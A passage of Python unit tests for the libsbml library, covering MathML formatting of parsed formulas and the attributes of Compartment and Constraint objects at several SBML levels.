expected = wrapMathML(" <ci> foo </ci>\n")
self.N = libsbml.parseFormula("foo")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_cn_e_notation_1(self):
expected = wrapMathML(" <cn type=\"e-notation\"> 0 <sep/> 3 </cn>\n"
)
self.N = libsbml.parseFormula("0e3")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_cn_e_notation_2(self):
expected = wrapMathML(" <cn type=\"e-notation\"> 2 <sep/> 3 </cn>\n"
)
self.N = libsbml.parseFormula("2e3")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_cn_e_notation_3(self):
expected = wrapMathML(" <cn type=\"e-notation\"> 1234567.8 <sep/> 3 </cn>\n"
)
self.N = libsbml.parseFormula("1234567.8e3")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_cn_e_notation_4(self):
expected = wrapMathML(" <cn type=\"e-notation\"> 6.0221367 <sep/> 23 </cn>\n"
)
self.N = libsbml.parseFormula("6.0221367e+23")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_cn_e_notation_5(self):
expected = wrapMathML(" <cn type=\"e-notation\"> 4 <sep/> -6 </cn>\n"
)
self.N = libsbml.parseFormula(".000004")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_cn_e_notation_6(self):
expected = wrapMathML(" <cn type=\"e-notation\"> 4 <sep/> -12 </cn>\n"
)
self.N = libsbml.parseFormula(".000004e-6")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_cn_e_notation_7(self):
expected = wrapMathML(" <cn type=\"e-notation\"> -1 <sep/> -6 </cn>\n"
)
self.N = libsbml.parseFormula("-1e-6")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_cn_integer(self):
expected = wrapMathML(" <cn type=\"integer\"> 5 </cn>\n")
self.N = libsbml.parseFormula("5")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_cn_rational(self):
expected = wrapMathML(" <cn type=\"rational\"> 1 <sep/> 3 </cn>\n"
)
self.N = libsbml.ASTNode()
self.N.setValue(1,3)
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_cn_real_1(self):
expected = wrapMathML(" <cn> 1.2 </cn>\n")
self.N = libsbml.parseFormula("1.2")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_cn_real_2(self):
expected = wrapMathML(" <cn> 1234567.8 </cn>\n")
self.N = libsbml.parseFormula("1234567.8")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_cn_real_3(self):
expected = wrapMathML(" <cn> -3.14 </cn>\n")
self.N = libsbml.parseFormula("-3.14")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_cn_real_locale(self):
expected = wrapMathML(" <cn> 2.72 </cn>\n")
self.N = libsbml.parseFormula("2.72")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_cn_units(self):
expected = wrapMathMLUnits(" <cn sbml:units=\"mole\"> 1.2 </cn>\n")
self.N = libsbml.parseFormula("1.2")
self.N.setUnits("mole")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_constant_exponentiale(self):
expected = wrapMathML(" <exponentiale/>\n")
self.N = libsbml.ASTNode(libsbml.AST_CONSTANT_E)
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_constant_false(self):
expected = wrapMathML(" <false/>\n")
self.N = libsbml.ASTNode(libsbml.AST_CONSTANT_FALSE)
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_constant_infinity(self):
expected = wrapMathML(" <infinity/>\n")
self.N = libsbml.ASTNode()
self.N.setValue( util_PosInf() )
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_constant_infinity_neg(self):
expected = wrapMathML(" <apply> <minus/> <infinity/> </apply>\n"
)
self.N = libsbml.ASTNode()
self.N.setValue(- util_PosInf())
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_constant_notanumber(self):
expected = wrapMathML(" <notanumber/>\n")
self.N = libsbml.ASTNode(libsbml.AST_REAL)
self.N.setValue( util_NaN() )
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_constant_true(self):
expected = wrapMathML(" <true/>\n")
self.N = libsbml.ASTNode(libsbml.AST_CONSTANT_TRUE)
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_csymbol_avogadro(self):
expected = wrapMathML(" <csymbol encoding=\"text\" " + "definitionURL=\"http://www.sbml.org/sbml/symbols/avogadro\"> NA </csymbol>\n")
self.N = libsbml.ASTNode(libsbml.AST_NAME_AVOGADRO)
self.N.setName("NA")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_csymbol_delay(self):
expected = wrapMathML(" <apply>\n" +
" <csymbol encoding=\"text\" definitionURL=\"http://www.sbml.org/sbml/" +
"symbols/delay\"> my_delay </csymbol>\n" +
" <ci> x </ci>\n" +
" <cn> 0.1 </cn>\n" +
" </apply>\n")
self.N = libsbml.parseFormula("delay(x, 0.1)")
self.N.setName("my_delay")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_csymbol_time(self):
expected = wrapMathML(" <csymbol encoding=\"text\" " + "definitionURL=\"http://www.sbml.org/sbml/symbols/time\"> t </csymbol>\n")
self.N = libsbml.ASTNode(libsbml.AST_NAME_TIME)
self.N.setName("t")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_function_1(self):
expected = wrapMathML(" <apply>\n" +
" <ci> foo </ci>\n" +
" <cn type=\"integer\"> 1 </cn>\n" +
" <cn type=\"integer\"> 2 </cn>\n" +
" <cn type=\"integer\"> 3 </cn>\n" +
" </apply>\n")
self.N = libsbml.parseFormula("foo(1, 2, 3)")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_function_2(self):
expected = wrapMathML(" <apply>\n" +
" <ci> foo </ci>\n" +
" <cn type=\"integer\"> 1 </cn>\n" +
" <cn type=\"integer\"> 2 </cn>\n" +
" <apply>\n" +
" <ci> bar </ci>\n" +
" <ci> z </ci>\n" +
" </apply>\n" +
" </apply>\n")
self.N = libsbml.parseFormula("foo(1, 2, bar(z))")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_lambda(self):
expected = wrapMathML(" <lambda>\n" +
" <bvar>\n" +
" <ci> x </ci>\n" +
" </bvar>\n" +
" <bvar>\n" +
" <ci> y </ci>\n" +
" </bvar>\n" +
" <apply>\n" +
" <root/>\n" +
" <degree>\n" +
" <cn type=\"integer\"> 2 </cn>\n" +
" </degree>\n" +
" <apply>\n" +
" <plus/>\n" +
" <apply>\n" +
" <power/>\n" +
" <ci> x </ci>\n" +
" <cn type=\"integer\"> 2 </cn>\n" +
" </apply>\n" +
" <apply>\n" +
" <power/>\n" +
" <ci> y </ci>\n" +
" <cn type=\"integer\"> 2 </cn>\n" +
" </apply>\n" +
" </apply>\n" +
" </apply>\n" +
" </lambda>\n")
self.N = libsbml.parseFormula("lambda(x, y, root(2, x^2 + y^2))")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_lambda_no_bvars(self):
expected = wrapMathML(" <lambda>\n" +
" <apply>\n" +
" <plus/>\n" +
" <cn type=\"integer\"> 2 </cn>\n" +
" <cn type=\"integer\"> 2 </cn>\n" +
" </apply>\n" +
" </lambda>\n")
self.N = libsbml.parseFormula("lambda(2 + 2)")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_log(self):
expected = wrapMathML(" <apply>\n" +
" <log/>\n" +
" <logbase>\n" +
" <cn type=\"integer\"> 2 </cn>\n" +
" </logbase>\n" +
" <ci> N </ci>\n" +
" </apply>\n")
self.N = libsbml.parseFormula("log(2, N)")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_minus(self):
expected = wrapMathML(" <apply>\n" +
" <minus/>\n" +
" <cn type=\"integer\"> 1 </cn>\n" +
" <cn type=\"integer\"> 2 </cn>\n" +
" </apply>\n")
self.N = libsbml.parseFormula("1 - 2")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_minus_unary_1(self):
expected = wrapMathML(" <cn type=\"integer\"> -2 </cn>\n"
)
self.N = libsbml.parseFormula("-2")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_minus_unary_2(self):
expected = wrapMathML(" <apply>\n" +
" <minus/>\n" +
" <ci> a </ci>\n" +
" </apply>\n")
self.N = libsbml.parseFormula("-a")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_piecewise(self):
expected = wrapMathML(" <piecewise>\n" +
" <piece>\n" +
" <apply>\n" +
" <minus/>\n" +
" <ci> x </ci>\n" +
" </apply>\n" +
" <apply>\n" +
" <lt/>\n" +
" <ci> x </ci>\n" +
" <cn type=\"integer\"> 0 </cn>\n" +
" </apply>\n" +
" </piece>\n" +
" <piece>\n" +
" <cn type=\"integer\"> 0 </cn>\n" +
" <apply>\n" +
" <eq/>\n" +
" <ci> x </ci>\n" +
" <cn type=\"integer\"> 0 </cn>\n" +
" </apply>\n" +
" </piece>\n" +
" <piece>\n" +
" <ci> x </ci>\n" +
" <apply>\n" +
" <gt/>\n" +
" <ci> x </ci>\n" +
" <cn type=\"integer\"> 0 </cn>\n" +
" </apply>\n" +
" </piece>\n" +
" </piecewise>\n")
f = "piecewise(-x, lt(x, 0), 0, eq(x, 0), x, gt(x, 0))"
self.N = libsbml.parseFormula(f)
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_piecewise_otherwise(self):
expected = wrapMathML(" <piecewise>\n" +
" <piece>\n" +
" <cn type=\"integer\"> 0 </cn>\n" +
" <apply>\n" +
" <lt/>\n" +
" <ci> x </ci>\n" +
" <cn type=\"integer\"> 0 </cn>\n" +
" </apply>\n" +
" </piece>\n" +
" <otherwise>\n" +
" <ci> x </ci>\n" +
" </otherwise>\n" +
" </piecewise>\n")
self.N = libsbml.parseFormula("piecewise(0, lt(x, 0), x)")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_plus_binary(self):
expected = wrapMathML(" <apply>\n" +
" <plus/>\n" +
" <cn type=\"integer\"> 1 </cn>\n" +
" <cn type=\"integer\"> 2 </cn>\n" +
" </apply>\n")
self.N = libsbml.parseFormula("1 + 2")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_plus_nary_1(self):
expected = wrapMathML(" <apply>\n" +
" <plus/>\n" +
" <cn type=\"integer\"> 1 </cn>\n" +
" <cn type=\"integer\"> 2 </cn>\n" +
" <cn type=\"integer\"> 3 </cn>\n" +
" </apply>\n")
self.N = libsbml.parseFormula("1 + 2 + 3")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_plus_nary_2(self):
expected = wrapMathML(" <apply>\n" +
" <plus/>\n" +
" <cn type=\"integer\"> 1 </cn>\n" +
" <cn type=\"integer\"> 2 </cn>\n" +
" <cn type=\"integer\"> 3 </cn>\n" +
" </apply>\n")
self.N = libsbml.parseFormula("(1 + 2) + 3")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_plus_nary_3(self):
expected = wrapMathML(" <apply>\n" +
" <plus/>\n" +
" <cn type=\"integer\"> 1 </cn>\n" +
" <cn type=\"integer\"> 2 </cn>\n" +
" <cn type=\"integer\"> 3 </cn>\n" +
" </apply>\n")
self.N = libsbml.parseFormula("1 + (2 + 3)")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_plus_nary_4(self):
expected = wrapMathML(" <apply>\n" +
" <plus/>\n" +
" <cn type=\"integer\"> 1 </cn>\n" +
" <cn type=\"integer\"> 2 </cn>\n" +
" <apply>\n" +
" <times/>\n" +
" <ci> x </ci>\n" +
" <ci> y </ci>\n" +
" <ci> z </ci>\n" +
" </apply>\n" +
" <cn type=\"integer\"> 3 </cn>\n" +
" </apply>\n")
self.N = libsbml.parseFormula("1 + 2 + x * y * z + 3")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_root(self):
expected = wrapMathML(" <apply>\n" +
" <root/>\n" +
" <degree>\n" +
" <cn type=\"integer\"> 3 </cn>\n" +
" </degree>\n" +
" <ci> x </ci>\n" +
" </apply>\n")
self.N = libsbml.parseFormula("root(3, x)")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_sin(self):
expected = wrapMathML(" <apply>\n" +
" <sin/>\n" +
" <ci> x </ci>\n" +
" </apply>\n")
self.N = libsbml.parseFormula("sin(x)")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestWriteMathML))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
```
#### File: test/sbml/TestCompartment.py
```python
import sys
import unittest
import libsbml
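# Unit tests for libsbml.Compartment at SBML Level 2 Version 4: constructor
# defaults, namespace-aware construction, and attribute setters/unsetters.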
class TestCompartment(unittest.TestCase):
global C
C = None
def setUp(self):
self.C = libsbml.Compartment(2,4)
if (self.C == None):
pass
pass
def tearDown(self):
_dummyList = [ self.C ]; _dummyList[:] = []; del _dummyList
pass
def test_Compartment_create(self):
self.assert_( self.C.getTypeCode() == libsbml.SBML_COMPARTMENT )
self.assert_( self.C.getMetaId() == "" )
self.assert_( self.C.getNotes() == None )
self.assert_( self.C.getAnnotation() == None )
self.assert_( self.C.getId() == "" )
self.assert_( self.C.getName() == "" )
self.assert_( self.C.getUnits() == "" )
self.assert_( self.C.getOutside() == "" )
self.assert_( self.C.getSpatialDimensions() == 3 )
self.assert_( self.C.getVolume() == 1.0 )
self.assert_( self.C.getConstant() == True )
self.assertEqual( False, self.C.isSetId() )
self.assertEqual( False, self.C.isSetName() )
self.assertEqual( False, self.C.isSetSize() )
self.assertEqual( False, self.C.isSetVolume() )
self.assertEqual( False, self.C.isSetUnits() )
self.assertEqual( False, self.C.isSetOutside() )
pass
def test_Compartment_createWith(self):
c = libsbml.Compartment(2,4)
c.setId( "A")
self.assert_( c.getTypeCode() == libsbml.SBML_COMPARTMENT )
self.assert_( c.getMetaId() == "" )
self.assert_( c.getNotes() == None )
self.assert_( c.getAnnotation() == None )
self.assert_( c.getName() == "" )
self.assert_( c.getSpatialDimensions() == 3 )
self.assert_(( "A" == c.getId() ))
self.assert_( c.getConstant() == True )
self.assertEqual( True, c.isSetId() )
self.assertEqual( False, c.isSetName() )
_dummyList = [ c ]; _dummyList[:] = []; del _dummyList
pass
def test_Compartment_createWithNS(self):
xmlns = libsbml.XMLNamespaces()
xmlns.add( "http://www.sbml.org", "testsbml")
sbmlns = libsbml.SBMLNamespaces(2,1)
sbmlns.addNamespaces(xmlns)
c = libsbml.Compartment(sbmlns)
self.assert_( c.getTypeCode() == libsbml.SBML_COMPARTMENT )
self.assert_( c.getMetaId() == "" )
self.assert_( c.getNotes() == None )
self.assert_( c.getAnnotation() == None )
self.assert_( c.getLevel() == 2 )
self.assert_( c.getVersion() == 1 )
self.assert_( c.getNamespaces() != None )
self.assert_( c.getNamespaces().getLength() == 2 )
self.assert_( c.getName() == "" )
self.assert_( c.getSpatialDimensions() == 3 )
self.assert_( c.getConstant() == True )
_dummyList = [ c ]; _dummyList[:] = []; del _dummyList
pass
def test_Compartment_free_NULL(self):
_dummyList = [ None ]; _dummyList[:] = []; del _dummyList
pass
def test_Compartment_getSpatialDimensions(self):
self.C.setSpatialDimensions(1)
self.assert_( self.C.getSpatialDimensions() == 1 )
pass
def test_Compartment_getsetConstant(self):
self.C.setConstant(True)
self.assert_( self.C.getConstant() == True )
pass
def test_Compartment_getsetType(self):
self.C.setCompartmentType( "cell")
self.assert_(( "cell" == self.C.getCompartmentType() ))
self.assertEqual( True, self.C.isSetCompartmentType() )
self.C.unsetCompartmentType()
self.assertEqual( False, self.C.isSetCompartmentType() )
pass
def test_Compartment_initDefaults(self):
c = libsbml.Compartment(2,4)
c.setId( "A")
c.initDefaults()
self.assert_(( "A" == c.getId() ))
self.assert_( c.getName() == "" )
self.assert_( c.getUnits() == "" )
self.assert_( c.getOutside() == "" )
self.assert_( c.getSpatialDimensions() == 3 )
self.assert_( c.getVolume() == 1.0 )
self.assert_( c.getConstant() == True )
self.assertEqual( True, c.isSetId() )
self.assertEqual( False, c.isSetName() )
self.assertEqual( False, c.isSetSize() )
self.assertEqual( False, c.isSetVolume() )
self.assertEqual( False, c.isSetUnits() )
self.assertEqual( False, c.isSetOutside() )
self.assertEqual( True, c.isSetSpatialDimensions() )
self.assertEqual( True, c.isSetConstant() )
_dummyList = [ c ]; _dummyList[:] = []; del _dummyList
pass
def test_Compartment_setId(self):
id = "mitochondria";
self.C.setId(id)
self.assert_(( id == self.C.getId() ))
self.assertEqual( True, self.C.isSetId() )
if (self.C.getId() == id):
pass
self.C.setId(self.C.getId())
self.assert_(( id == self.C.getId() ))
self.C.setId("")
self.assertEqual( False, self.C.isSetId() )
if (self.C.getId() != None):
pass
pass
def test_Compartment_setName(self):
name = "My_Favorite_Factory";
self.C.setName(name)
self.assert_(( name == self.C.getName() ))
self.assertEqual( True, self.C.isSetName() )
if (self.C.getName() == name):
pass
self.C.setName(self.C.getName())
self.assert_(( name == self.C.getName() ))
self.C.setName("")
self.assertEqual( False, self.C.isSetName() )
if (self.C.getName() != None):
pass
pass
def test_Compartment_setOutside(self):
outside = "cell";
self.C.setOutside(outside)
self.assert_(( outside == self.C.getOutside() ))
self.assertEqual( True, self.C.isSetOutside() )
if (self.C.getOutside() == outside):
pass
self.C.setOutside(self.C.getOutside())
self.assert_(( outside == self.C.getOutside() ))
self.C.setOutside("")
self.assertEqual( False, self.C.isSetOutside() )
if (self.C.getOutside() != None):
pass
pass
def test_Compartment_setUnits(self):
units = "volume";
self.C.setUnits(units)
self.assert_(( units == self.C.getUnits() ))
self.assertEqual( True, self.C.isSetUnits() )
if (self.C.getUnits() == units):
pass
self.C.setUnits(self.C.getUnits())
self.assert_(( units == self.C.getUnits() ))
self.C.setUnits("")
self.assertEqual( False, self.C.isSetUnits() )
if (self.C.getUnits() != None):
pass
pass
def test_Compartment_unsetSize(self):
self.C.setSize(0.2)
self.assert_( self.C.getSize() == 0.2 )
self.assertEqual( True, self.C.isSetSize() )
self.C.unsetSize()
self.assertEqual( False, self.C.isSetSize() )
pass
def test_Compartment_unsetVolume(self):
self.C.setVolume(1.0)
self.assert_( self.C.getVolume() == 1.0 )
self.C.unsetVolume()
self.assertEqual( False, self.C.isSetVolume() )
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestCompartment))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
```
#### File: test/sbml/TestConstraint.py
```python
import sys
import unittest
import libsbml
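# Unit tests for libsbml.Constraint: construction and the copy semantics of
# setMath()/setMessage() (the object stores copies, so getters never return
# the instance that was passed in).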
class TestConstraint(unittest.TestCase):
global C
C = None
def setUp(self):
self.C = libsbml.Constraint(2,4)
if (self.C == None):
pass
pass
def tearDown(self):
_dummyList = [ self.C ]; _dummyList[:] = []; del _dummyList
pass
def test_Constraint_create(self):
self.assert_( self.C.getTypeCode() == libsbml.SBML_CONSTRAINT )
self.assert_( self.C.getMetaId() == "" )
self.assert_( self.C.getNotes() == None )
self.assert_( self.C.getAnnotation() == None )
self.assertEqual( False, self.C.isSetMessage() )
self.assertEqual( False, self.C.isSetMath() )
pass
def test_Constraint_createWithNS(self):
xmlns = libsbml.XMLNamespaces()
xmlns.add( "http://www.sbml.org", "testsbml")
sbmlns = libsbml.SBMLNamespaces(2,2)
sbmlns.addNamespaces(xmlns)
object = libsbml.Constraint(sbmlns)
self.assert_( object.getTypeCode() == libsbml.SBML_CONSTRAINT )
self.assert_( object.getMetaId() == "" )
self.assert_( object.getNotes() == None )
self.assert_( object.getAnnotation() == None )
self.assert_( object.getLevel() == 2 )
self.assert_( object.getVersion() == 2 )
self.assert_( object.getNamespaces() != None )
self.assert_( object.getNamespaces().getLength() == 2 )
_dummyList = [ object ]; _dummyList[:] = []; del _dummyList
pass
def test_Constraint_free_NULL(self):
_dummyList = [ None ]; _dummyList[:] = []; del _dummyList
pass
def test_Constraint_setMath(self):
math = libsbml.parseFormula("2 * k")
self.C.setMath(math)
self.assert_( self.C.getMath() != math )
self.assertEqual( True, self.C.isSetMath() )
self.C.setMath(self.C.getMath())
self.assert_( self.C.getMath() != math )
self.C.setMath(None)
self.assertEqual( False, self.C.isSetMath() )
if (self.C.getMath() != None):
pass
_dummyList = [ math ]; _dummyList[:] = []; del _dummyList
pass
def test_Constraint_setMessage(self):
text = libsbml.XMLNode.convertStringToXMLNode(" Some text ",None)
triple = libsbml.XMLTriple("p", "http://www.w3.org/1999/xhtml", "")
att = libsbml.XMLAttributes()
xmlns = libsbml.XMLNamespaces()
xmlns.add( "http://www.w3.org/1999/xhtml", "")
p = libsbml.XMLNode(triple,att,xmlns)
p.addChild(text)
triple1 = libsbml.XMLTriple("message", "", "")
att1 = libsbml.XMLAttributes()
node = libsbml.XMLNode(triple1,att1)
node.addChild(p)
self.C.setMessage(node)
self.assert_( self.C.getMessage() != node )
self.assert_( self.C.isSetMessage() == True )
self.C.setMessage(self.C.getMessage())
self.assert_( self.C.getMessage() != node )
self.assert_( self.C.getMessageString() != None )
self.C.unsetMessage()
self.assertEqual( False, self.C.isSetMessage() )
if (self.C.getMessage() != None):
pass
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestConstraint))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
```
#### File: test/sbml/TestL3Compartment.py
```python
import sys
import unittest
import libsbml
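# Unit tests for libsbml.Compartment at SBML Level 3 Version 1, where size,
# units, constant and spatialDimensions have no defaults (numeric getters
# return NaN) until initDefaults() is called.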
def isnan(x):
return (x != x)
pass
class TestL3Compartment(unittest.TestCase):
global C
C = None
def setUp(self):
self.C = libsbml.Compartment(3,1)
if (self.C == None):
pass
pass
def tearDown(self):
_dummyList = [ self.C ]; _dummyList[:] = []; del _dummyList
pass
def test_L3_Compartment_NS(self):
self.assert_( self.C.getNamespaces() != None )
self.assert_( self.C.getNamespaces().getLength() == 1 )
self.assert_(( "http://www.sbml.org/sbml/level3/version1/core" == self.C.getNamespaces().getURI(0) ))
pass
def test_L3_Compartment_constant(self):
self.assert_( self.C.isSetConstant() == False )
self.C.setConstant(True)
self.assert_( self.C.getConstant() == True )
self.assert_( self.C.isSetConstant() == True )
self.C.setConstant(False)
self.assert_( self.C.getConstant() == False )
self.assert_( self.C.isSetConstant() == True )
pass
def test_L3_Compartment_create(self):
self.assert_( self.C.getTypeCode() == libsbml.SBML_COMPARTMENT )
self.assert_( self.C.getMetaId() == "" )
self.assert_( self.C.getNotes() == None )
self.assert_( self.C.getAnnotation() == None )
self.assert_( self.C.getId() == "" )
self.assert_( self.C.getName() == "" )
self.assert_( self.C.getUnits() == "" )
self.assert_( self.C.getOutside() == "" )
self.assertEqual( True, isnan(self.C.getSpatialDimensionsAsDouble()) )
self.assertEqual( True, isnan(self.C.getVolume()) )
self.assert_( self.C.getConstant() == True )
self.assertEqual( False, self.C.isSetId() )
self.assertEqual( False, self.C.isSetSpatialDimensions() )
self.assertEqual( False, self.C.isSetName() )
self.assertEqual( False, self.C.isSetSize() )
self.assertEqual( False, self.C.isSetVolume() )
self.assertEqual( False, self.C.isSetUnits() )
self.assertEqual( False, self.C.isSetOutside() )
self.assertEqual( False, self.C.isSetConstant() )
pass
def test_L3_Compartment_createWithNS(self):
xmlns = libsbml.XMLNamespaces()
xmlns.add( "http://www.sbml.org", "testsbml")
sbmlns = libsbml.SBMLNamespaces(3,1)
sbmlns.addNamespaces(xmlns)
c = libsbml.Compartment(sbmlns)
self.assert_( c.getTypeCode() == libsbml.SBML_COMPARTMENT )
self.assert_( c.getMetaId() == "" )
self.assert_( c.getNotes() == None )
self.assert_( c.getAnnotation() == None )
self.assert_( c.getLevel() == 3 )
self.assert_( c.getVersion() == 1 )
self.assert_( c.getNamespaces() != None )
self.assert_( c.getNamespaces().getLength() == 2 )
self.assert_( c.getId() == "" )
self.assert_( c.getName() == "" )
self.assert_( c.getUnits() == "" )
self.assert_( c.getOutside() == "" )
self.assertEqual( True, isnan(c.getSpatialDimensionsAsDouble()) )
self.assertEqual( True, isnan(c.getVolume()) )
self.assert_( c.getConstant() == True )
self.assertEqual( False, c.isSetId() )
self.assertEqual( False, c.isSetSpatialDimensions() )
self.assertEqual( False, c.isSetName() )
self.assertEqual( False, c.isSetSize() )
self.assertEqual( False, c.isSetVolume() )
self.assertEqual( False, c.isSetUnits() )
self.assertEqual( False, c.isSetOutside() )
self.assertEqual( False, c.isSetConstant() )
_dummyList = [ c ]; _dummyList[:] = []; del _dummyList
pass
def test_L3_Compartment_free_NULL(self):
_dummyList = [ None ]; _dummyList[:] = []; del _dummyList
pass
def test_L3_Compartment_hasRequiredAttributes(self):
c = libsbml.Compartment(3,1)
self.assertEqual( False, c.hasRequiredAttributes() )
c.setId( "id")
self.assertEqual( False, c.hasRequiredAttributes() )
c.setConstant(False)
self.assertEqual( True, c.hasRequiredAttributes() )
_dummyList = [ c ]; _dummyList[:] = []; del _dummyList
pass
def test_L3_Compartment_id(self):
id = "mitochondria";
self.assertEqual( False, self.C.isSetId() )
self.C.setId(id)
self.assert_(( id == self.C.getId() ))
self.assertEqual( True, self.C.isSetId() )
if (self.C.getId() == id):
pass
pass
def test_L3_Compartment_initDefaults(self):
c = libsbml.Compartment(3,1)
c.setId( "A")
self.assertEqual( True, c.isSetId() )
self.assertEqual( False, c.isSetName() )
self.assertEqual( False, c.isSetSize() )
self.assertEqual( False, c.isSetVolume() )
self.assertEqual( False, c.isSetUnits() )
self.assertEqual( False, c.isSetConstant() )
self.assertEqual( False, c.isSetSpatialDimensions() )
c.initDefaults()
self.assert_(( "A" == c.getId() ))
self.assert_( c.getName() == "" )
self.assert_(( "litre" == c.getUnits() ))
self.assert_( c.getSpatialDimensions() == 3 )
self.assert_( c.getSize() == 1 )
self.assert_( c.getConstant() == True )
self.assertEqual( True, c.isSetId() )
self.assertEqual( False, c.isSetName() )
self.assertEqual( False, c.isSetSize() )
self.assertEqual( False, c.isSetVolume() )
self.assertEqual( True, c.isSetUnits() )
self.assertEqual( True, c.isSetConstant() )
self.assertEqual( True, c.isSetSpatialDimensions() )
_dummyList = [ c ]; _dummyList[:] = []; del _dummyList
pass
def test_L3_Compartment_name(self):
name = "My_Favorite_Factory";
self.assertEqual( False, self.C.isSetName() )
self.C.setName(name)
self.assert_(( name == self.C.getName() ))
self.assertEqual( True, self.C.isSetName() )
if (self.C.getName() == name):
pass
self.C.unsetName()
self.assertEqual( False, self.C.isSetName() )
if (self.C.getName() != None):
pass
pass
def test_L3_Compartment_size(self):
size = 0.2
self.assertEqual( False, self.C.isSetSize() )
self.assertEqual( True, isnan(self.C.getSize()) )
self.C.setSize(size)
self.assert_( self.C.getSize() == size )
self.assertEqual( True, self.C.isSetSize() )
self.C.unsetSize()
self.assertEqual( False, self.C.isSetSize() )
self.assertEqual( True, isnan(self.C.getSize()) )
pass
def test_L3_Compartment_spatialDimensions(self):
self.assertEqual( False, self.C.isSetSpatialDimensions() )
